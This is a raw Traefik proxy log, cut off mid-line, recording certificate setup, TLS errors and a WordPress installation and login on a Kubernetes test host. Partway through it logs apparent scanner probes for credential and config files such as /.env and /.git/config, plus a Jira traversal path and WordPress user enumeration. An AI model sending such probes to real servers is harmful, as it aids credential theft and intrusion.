+time="2024-03-30T07:38:46Z" level=debug msg="No ACME certificate generation required for domains [\"whoami.172.233.168.9.nip.io\"]." routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" +time="2024-03-30T07:38:47Z" level=debug msg="legolog: [INFO] Wait for certificate [timeout: 30s, interval: 500ms]" +time="2024-03-30T07:38:48Z" level=debug msg="legolog: [INFO] [whoami.172.233.168.9.nip.io] Server responded with a certificate." +time="2024-03-30T07:38:48Z" level=debug msg="Certificates obtained for domains [whoami.172.233.168.9.nip.io]" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" +time="2024-03-30T07:38:48Z" level=debug msg="Configuration received: {\"http\":{},\"tcp\":{},\"udp\":{},\"tls\":{}}" providerName=le.acme +time="2024-03-30T07:38:48Z" level=debug msg="Adding certificate for domain(s) whoami.172.233.168.9.nip.io" +time="2024-03-30T07:38:48Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T07:38:48Z" level=debug msg="Added outgoing tracing middleware api@internal" middlewareName=tracing middlewareType=TracingForwarder routerName=api@internal entryPointName=traefik +time="2024-03-30T07:38:48Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" middlewareType=TracingForwarder entryPointName=traefik routerName=dashboard@internal middlewareName=tracing +time="2024-03-30T07:38:48Z" level=debug msg="Creating middleware" middlewareType=StripPrefix entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal +time="2024-03-30T07:38:48Z" level=debug msg="Adding tracing to middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal +time="2024-03-30T07:38:48Z" level=debug msg="Creating middleware" middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:38:48Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:38:48Z" level=debug msg="Adding tracing to middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_redirect@internal +time="2024-03-30T07:38:48Z" level=debug msg="Creating middleware" entryPointName=traefik middlewareName=traefik-internal-recovery middlewareType=Recovery +time="2024-03-30T07:38:48Z" level=debug msg="Creating middleware" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 middlewareName=pipelining middlewareType=Pipelining entryPointName=websecure +time="2024-03-30T07:38:48Z" level=debug msg="Creating load-balancer" entryPointName=websecure routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 +time="2024-03-30T07:38:48Z" level=debug msg="Creating server 0 http://10.2.1.35:80" serverName=0 routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 entryPointName=websecure +time="2024-03-30T07:38:48Z" level=debug msg="child http://10.2.1.35:80 now UP" +time="2024-03-30T07:38:48Z" level=debug msg="Propagating new UP status" +time="2024-03-30T07:38:48Z" level=debug msg="Added outgoing tracing middleware akashop-wp-80" middlewareType=TracingForwarder entryPointName=websecure routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes middlewareName=tracing +time="2024-03-30T07:38:48Z" level=debug msg="Creating middleware" middlewareType=Recovery entryPointName=websecure middlewareName=traefik-internal-recovery +time="2024-03-30T07:38:48Z" level=debug msg="Adding route for whoami.172.233.168.9.nip.io with TLS options default" entryPointName=websecure +time="2024-03-30T07:38:48Z" level=debug msg="Trying to challenge certificate for domain [whoami.172.233.168.9.nip.io] found in HostSNI rule" ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme +time="2024-03-30T07:38:48Z" level=debug msg="Looking for provided certificate(s) to validate [\"whoami.172.233.168.9.nip.io\"]..." rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:38:48Z" level=debug msg="No ACME certificate generation required for domains [\"whoami.172.233.168.9.nip.io\"]." routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes rule="Host(`whoami.172.233.168.9.nip.io`) && PathPrefix(`/`)" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" +10.2.0.129 - - [30/Mar/2024:07:39:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 533 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:39:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 764 "-" "-" 534 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:39:20 +0000] "GET /dashboard/providers/kubernetes.svg HTTP/1.1" 200 4605 "-" "-" 535 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:39:57 +0000] "GET / HTTP/1.1" 302 0 "-" "-" 536 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 16ms +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:38209: read tcp 10.2.0.36:443->10.0.0.4:38209: read: connection reset by peer" +10.0.0.4 - - [30/Mar/2024:07:39:58 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 537 "-" "-" 0ms +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:26285: read tcp 10.2.0.36:443->10.2.1.1:26285: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:6114: tls: no cipher suite supported by both client and server" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:10534: read tcp 10.2.0.36:80->10.2.1.1:10534: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:49871: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:7603: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:2889: read tcp 10.2.0.36:80->10.2.0.129:2889: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:54333: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:28147: tls: no cipher suite supported by both client and server" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:37473: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:17649: read tcp 10.2.0.36:443->10.0.0.4:17649: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:15945: read tcp 10.2.0.36:443->10.2.1.1:15945: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:5980: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:16878: read tcp 10.2.0.36:443->10.2.0.129:16878: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:1784: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:58433: read tcp 10.2.0.36:443->10.0.0.4:58433: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +10.2.1.1 - - [30/Mar/2024:07:39:58 +0000] "GET / HTTP/1.1" 302 0 "-" "-" 538 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 12ms +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:28971: read tcp 10.2.0.36:80->10.2.1.1:28971: read: connection reset by peer" +time="2024-03-30T07:39:58Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:6096: read tcp 10.2.0.36:80->10.2.0.129:6096: read: connection reset by peer" +10.2.0.129 - - [30/Mar/2024:07:39:59 +0000] "GET /server HTTP/1.1" 302 0 "-" "-" 539 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 13ms +time="2024-03-30T07:39:59Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:21591: read tcp 10.2.0.36:80->10.0.0.4:21591: read: connection reset by peer" +10.0.0.4 - - [30/Mar/2024:07:39:59 +0000] "GET /.vscode/sftp.json HTTP/1.1" 302 0 "-" "-" 540 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 14ms +time="2024-03-30T07:39:59Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T07:39:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:25646: read tcp 10.2.0.36:80->10.2.1.1:25646: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:07:39:59 +0000] "GET /about HTTP/1.1" 302 0 "-" "-" 541 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 14ms +10.2.0.129 - - [30/Mar/2024:07:39:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 542 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:39:59 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 302 0 "-" "-" 543 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 15ms +10.0.0.4 - - [30/Mar/2024:07:39:59 +0000] "GET /server HTTP/1.1" 404 19 "-" "-" 544 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:39:59 +0000] "GET /v2/_catalog HTTP/1.1" 302 0 "-" "-" 545 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 15ms +10.2.1.1 - - [30/Mar/2024:07:39:59 +0000] "GET /version HTTP/1.1" 404 19 "-" "-" 546 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:39:59 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 302 0 "-" "-" 547 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 13ms +10.2.0.129 - - [30/Mar/2024:07:39:59 +0000] "GET /server-status HTTP/1.1" 403 292 "-" "-" 548 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 1ms +10.2.0.129 - - [30/Mar/2024:07:39:59 +0000] "GET /.vscode/sftp.json HTTP/1.1" 404 19 "-" "-" 549 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:39:59 +0000] "GET /login.action HTTP/1.1" 302 0 "-" "-" 550 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 13ms +10.0.0.4 - - [30/Mar/2024:07:39:59 +0000] "GET /about HTTP/1.1" 404 19 "-" "-" 551 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:40:00 +0000] "GET /_all_dbs HTTP/1.1" 302 0 "-" "-" 552 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 14ms +10.2.1.1 - - [30/Mar/2024:07:40:00 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 404 19 "-" "-" 553 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:40:00 +0000] "GET /.DS_Store HTTP/1.1" 302 0 "-" "-" 554 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 11ms +10.2.0.129 - - [30/Mar/2024:07:40:00 +0000] "GET /v2/_catalog HTTP/1.1" 404 19 "-" "-" 555 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:40:00 +0000] "GET /.env HTTP/1.1" 302 0 "-" "-" 556 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 15ms +10.0.0.4 - - [30/Mar/2024:07:40:00 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 19 "-" "-" 557 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:40:00 +0000] "GET /.git/config HTTP/1.1" 302 0 "-" "-" 558 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 12ms +10.2.0.129 - - [30/Mar/2024:07:40:00 +0000] "GET /s/93e2836313e2333323e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 302 0 "-" "-" 559 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 12ms +10.2.1.1 - - [30/Mar/2024:07:40:00 +0000] "GET /server-status HTTP/1.1" 404 19 "-" "-" 560 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:40:00 +0000] "GET /config.json HTTP/1.1" 302 0 "-" "-" 561 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 14ms +10.2.0.129 - - [30/Mar/2024:07:40:00 +0000] "GET /login.action HTTP/1.1" 404 19 "-" "-" 562 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:40:00 +0000] "GET /telescope/requests HTTP/1.1" 302 0 "-" "-" 563 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 12ms +10.0.0.4 - - [30/Mar/2024:07:40:00 +0000] "GET /_all_dbs HTTP/1.1" 404 19 "-" "-" 564 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:40:00 +0000] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 302 0 "-" "-" 565 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 11ms +10.2.1.1 - - [30/Mar/2024:07:40:01 +0000] "GET /.DS_Store HTTP/1.1" 404 19 "-" "-" 566 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:40:01 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 567 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:40:01 +0000] "GET /.git/config HTTP/1.1" 404 19 "-" "-" 568 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:40:01 +0000] "GET /s/93e2836313e2333323e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 19 "-" "-" 569 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:40:01 +0000] "GET /config.json HTTP/1.1" 404 19 "-" "-" 570 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:40:01 +0000] "GET /telescope/requests HTTP/1.1" 404 19 "-" "-" 571 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:40:02 +0000] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 404 19 "-" "-" 572 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:40:06 +0000] "HEAD / HTTP/1.1" 302 0 "-" "-" 573 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 16ms +10.2.0.129 - - [30/Mar/2024:07:40:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 574 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:40:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 764 "-" "-" 575 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:40:21 +0000] "GET / HTTP/1.1" 302 0 "-" "-" 576 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 14ms +10.2.0.129 - - [30/Mar/2024:07:40:49 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 577 "-" "-" 0ms +time="2024-03-30T07:40:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:30997: remote error: tls: unknown certificate" +time="2024-03-30T07:40:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:45526: remote error: tls: unknown certificate" +time="2024-03-30T07:40:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:20720: remote error: tls: unknown certificate" +time="2024-03-30T07:40:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:60099: remote error: tls: unknown certificate" +time="2024-03-30T07:40:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:55721: remote error: tls: unknown certificate" +time="2024-03-30T07:40:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:24494: remote error: tls: unknown certificate" +10.2.0.129 - - [30/Mar/2024:07:40:59 +0000] "GET /wp-admin/install.php HTTP/2.0" 200 2387 "-" "-" 578 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 902ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-includes/css/buttons.min.css?ver=6.4.3 HTTP/2.0" 200 1472 "-" "-" 580 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-admin/css/forms.min.css?ver=6.4.3 HTTP/2.0" 200 6536 "-" "-" 581 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-includes/css/dashicons.min.css?ver=6.4.3 HTTP/2.0" 200 35730 "-" "-" 579 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 7ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-admin/css/l10n.min.css?ver=6.4.3 HTTP/2.0" 200 686 "-" "-" 582 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-admin/css/install.min.css?ver=6.4.3 HTTP/2.0" 200 1844 "-" "-" 583 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-includes/js/zxcvbn-async.min.js?ver=1.0 HTTP/2.0" 200 256 "-" "-" 586 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 1ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/2.0" 200 4872 "-" "-" 585 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:41:01 +0000] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/2.0" 200 30368 "-" "-" 584 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 9ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-admin/images/wordpress-logo.svg?ver=20131107 HTTP/2.0" 200 1521 "-" "-" 587 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2 HTTP/2.0" 200 2484 "-" "-" 588 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 4ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0 HTTP/2.0" 200 2502 "-" "-" 589 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/2.0" 200 35888 "-" "-" 590 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 8ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1 HTTP/2.0" 200 1567 "-" "-" 591 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 1ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef HTTP/2.0" 200 3692 "-" "-" 592 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 1ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-admin/js/password-strength-meter.min.js?ver=6.4.3 HTTP/2.0" 200 621 "-" "-" 593 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-includes/js/underscore.min.js?ver=1.13.4 HTTP/2.0" 200 7311 "-" "-" 594 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.0.129 - - [30/Mar/2024:07:41:02 +0000] "GET /wp-includes/js/wp-util.min.js?ver=6.4.3 HTTP/2.0" 200 756 "-" "-" 595 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.0.129 - - [30/Mar/2024:07:41:03 +0000] "GET /wp-admin/js/user-profile.min.js?ver=6.4.3 HTTP/2.0" 200 2361 "-" "-" 596 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:41:03 +0000] "GET /favicon.ico HTTP/2.0" 302 0 "-" "-" 598 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 11ms +10.2.0.129 - - [30/Mar/2024:07:41:03 +0000] "GET /wp-includes/js/zxcvbn.min.js HTTP/2.0" 200 399661 "-" "-" 597 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 74ms +10.2.0.129 - - [30/Mar/2024:07:41:04 +0000] "GET /wp-admin/install.php HTTP/2.0" 200 2388 "-" "-" 599 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 128ms +time="2024-03-30T07:41:12Z" level=debug msg="http: TLS handshake error from 10.2.1.1:63310: remote error: tls: unknown certificate" +time="2024-03-30T07:41:13Z" level=debug msg="http: TLS handshake error from 10.2.0.129:30686: remote error: tls: unknown certificate" +time="2024-03-30T07:41:14Z" level=debug msg="http: TLS handshake error from 10.2.1.1:63199: local error: tls: bad record MAC" +time="2024-03-30T07:41:15Z" level=debug msg="http: TLS handshake error from 10.2.1.1:21674: local error: tls: bad record MAC" +10.0.0.4 - - [30/Mar/2024:07:41:13 +0000] "POST /wp-admin/install.php?step=2 HTTP/2.0" 200 1281 "-" "-" 600 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2286ms +time="2024-03-30T07:41:17Z" level=debug msg="'499 Client Closed Request' caused by: context canceled" +10.2.1.1 - - [30/Mar/2024:07:41:16 +0000] "POST /wp-cron.php?doing_wp_cron=1711784476.2877221107482910156250 HTTP/1.1" 499 21 "-" "-" 602 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 990ms +10.0.0.4 - - [30/Mar/2024:07:41:16 +0000] "GET /favicon.ico HTTP/2.0" 301 0 "-" "-" 601 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 1200ms +10.0.0.4 - - [30/Mar/2024:07:41:17 +0000] "GET /favicon.ico/ HTTP/2.0" 200 14505 "-" "-" 603 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 107ms +10.2.0.129 - - [30/Mar/2024:07:41:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 604 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:41:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 764 "-" "-" 605 "api@internal" "-" 0ms +time="2024-03-30T07:41:40Z" level=debug msg="http: TLS handshake error from 10.2.0.129:1777: remote error: tls: unknown certificate" +10.0.0.4 - - [30/Mar/2024:07:41:40 +0000] "GET /wp-login.php HTTP/2.0" 200 1782 "-" "-" 606 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 63ms +10.0.0.4 - - [30/Mar/2024:07:41:41 +0000] "GET /wp-admin/css/login.min.css?ver=6.4.3 HTTP/2.0" 200 2222 "-" "-" 607 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.0.0.4 - - [30/Mar/2024:07:41:41 +0000] "GET /favicon.ico HTTP/2.0" 301 0 "-" "-" 609 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 35ms +10.0.0.4 - - [30/Mar/2024:07:41:41 +0000] "GET /wp-includes/js/zxcvbn.min.js HTTP/2.0" 200 399661 "-" "-" 608 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 66ms +10.0.0.4 - - [30/Mar/2024:07:41:42 +0000] "GET /favicon.ico/ HTTP/2.0" 200 14505 "-" "-" 610 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 85ms +time="2024-03-30T07:41:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:62340: remote error: tls: unknown certificate" +time="2024-03-30T07:41:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:7010: remote error: tls: unknown certificate" +10.2.1.1 - - [30/Mar/2024:07:41:56 +0000] "POST /wp-login.php HTTP/2.0" 302 0 "-" "-" 611 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 87ms +10.2.1.1 - - [30/Mar/2024:07:41:56 +0000] "GET /wp-admin/ HTTP/2.0" 200 17430 "-" "-" 612 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 413ms +10.2.1.1 - - [30/Mar/2024:07:41:57 +0000] "GET /wp-includes/js/thickbox/thickbox.css?ver=6.4.3 HTTP/2.0" 200 939 "-" "-" 614 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:41:57 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5Bchunk_0%5D=jquery-core,jquery-migrate,utils&ver=6.4.3 HTTP/2.0" 200 35062 "-" "-" 615 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 12ms +10.2.1.1 - - [30/Mar/2024:07:41:57 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check&ver=6.4.3 HTTP/2.0" 200 100807 "-" "-" 613 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 33ms +10.2.1.1 - - [30/Mar/2024:07:41:57 +0000] "GET /wp-includes/css/editor.min.css?ver=6.4.3 HTTP/2.0" 200 5872 "-" "-" 617 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:41:57 +0000] "GET 